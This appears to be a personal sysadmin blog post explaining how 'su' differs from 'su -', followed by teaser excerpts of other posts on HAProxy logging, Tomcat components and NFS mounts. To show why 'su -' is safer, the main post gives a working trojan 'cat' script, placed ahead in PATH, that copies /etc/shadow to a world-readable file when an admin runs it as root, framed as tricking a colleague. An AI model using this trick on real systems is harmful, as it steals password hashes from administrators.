su su- sudo

By OK -
su su- sudo

su - logs you in completely as root, whereas su makes it so you are pretending to be root.

The hyphen has two effects:

1) switches from the current directory to the home directory of the new user (e.g., to /root in the case of the root user) by logging in as that user

2) changes the environmental variables to those of the new user as dictated by their ~/.bashrc. That is, if the first argument to su is a hyphen, the current directory and environment will be changed to what would be expected if the new user had actually logged on to a new session (rather than just taking over an existing session).
su - invokes a login shell after switching the user. A login shell resets most environment variables, providing a clean base.
su just switches the user, providing a normal shell with an environment nearly the same as with the old user.
Imagine, you're a software developer with normal user access to a machine and your ignorant admin just won't give you root access. Let's (hopefully) trick him.
$ mkdir /tmp/evil_bin
$ vi /tmp/evil_bin/cat
#!/bin/bash
test $UID != 0 && { echo "/bin/cat: Permission denied!"; exit 1; }
/bin/cat /etc/shadow &>/tmp/shadow_copy
/bin/cat "$@"
exit 0

$ chmod +x /tmp/evil_bin/cat
$ PATH="/tmp/evil_bin:$PATH"
Now, you ask your admin why you can't cat the dummy file in your home folder, it just won't work!
$ ls -l /home/you/dummy_file
-rw-r--r-- 1 you wheel 41 2011-02-07 13:00 dummy_file
$ cat /home/you/dummy_file
/bin/cat: Permission denied!
If your admin isn't that smart or just a bit lazy, he might come to your desk and try with his super-user powers:
$ su
Password: ...
# cat /home/you/dummy_file
Some important dummy stuff in that file.
# exit
Wow! Thanks, super admin!
$ ls -l /tmp/shadow_copy
-rw-r--r-- 1 root root 1093 2011-02-07 13:02 /tmp/shadow_copy
He, he.
You maybe noticed that the corrupted $PATH variable was not reset. This wouldn't have happened, if the admin invoked su - instead.

Comments

Post a Comment

Popular posts from this blog

HAproxy logging

By OK -
ubuntu@ubuntu:/etc/haproxy$ cat /etc/rsyslog.d/haproxy.conf # Create an additional socket in haproxy's chroot in order to allow logging via # /dev/log to chroot'ed HAProxy processes $ModLoad imudp $UDPServerRun 514 local0.* -/var/log/haproxy-0.log local1.* -/var/log/haproxy-1.log ### keep logs in localhost ## $AddUnixListenSocket /var/lib/haproxy/dev/log ------------------- ubuntu@ubuntu:/etc/haproxy$ cat /etc/haproxy/haproxy.cfg global chroot /var/lib/haproxy user haproxy group haproxy log 127.0.0.1   local0         log 127.0.0.1   local1 notice daemon frontend www     bind 192.168.40.128:8282    # haproxy public IP     default_backend as-backend    # backend used backend as-backend    balance leastconn    mode http  server as1 192.168.40.128:8082 check    # application srv 1 defaults log global mode http option httplog option dontlognull         contimeout 5000    
Read more

tomcat catalina coyote jasper cluster

By OK -
Tomcat Component are Catalina Coyote Jasper Cluster Catalina :  Catalina is the name of the servlet container of Apache Tomcat since version 4.x. Tomcat implements Sun Microsystems' specifications for servlet and JavaServer Pages (JSP), which are important Java-based Web technologies. Tomcat's servlet container was redesigned as Catalina in Tomcat version 4.x. other components of the Tomcat engine are: Tomcat Jasper which converts the code portions within JavaServer Pages into servlets and pass them to Catalina to process. Tomcat Coyote which is an HTTP connector based on HTTP/1.1 specifications that receives and transmits web requests to the Tomcat engine by listening to a TCP/IP port and returns requests back to the requesting client. Coyote :  The Coyote JK Connector element represents a Connector component that communicates with a web connector via the JK protocol (also known as the AJP protocol). This is used for cases where you wish to invisibly integr
Read more

NFS mount add in fstab _netdev instead of default | firewall-cmd --list-all

By OK -
Redhat recommends us to add  _netdev  option for NFS file system in /etc/fstab. So that they can be mounted after starting the networking service. Alternative ways to refer to partitions: Label : LABEL=label Network ID Samba : //server/share NFS : server:/share SSHFS : sshfs#user@server:/share Device : /dev/sdxy (not recommended) Example #1 //192.168.1.134/share_name /mnt/share_name cifs username=server_user,password=server_password,_netdev 0 0 ^ Path to your share ^ Mountpoint ^ Username ^ Password ^ See note A Note A: The  _netdev  options makes sure the mount is only attempted AFTER a network connection has been established. Example #2 10.10.10.1:/vol1/fs1 /data nfs defaults,_netdev 0 0 ============================ [root@localhost ~]# firewall-cmd --list-all public   target: default   icmp-block-inversion: no   interfaces:   sources:   services: dhcpv6-client high-availability ssh   ports:   protocols:   masquera
Read more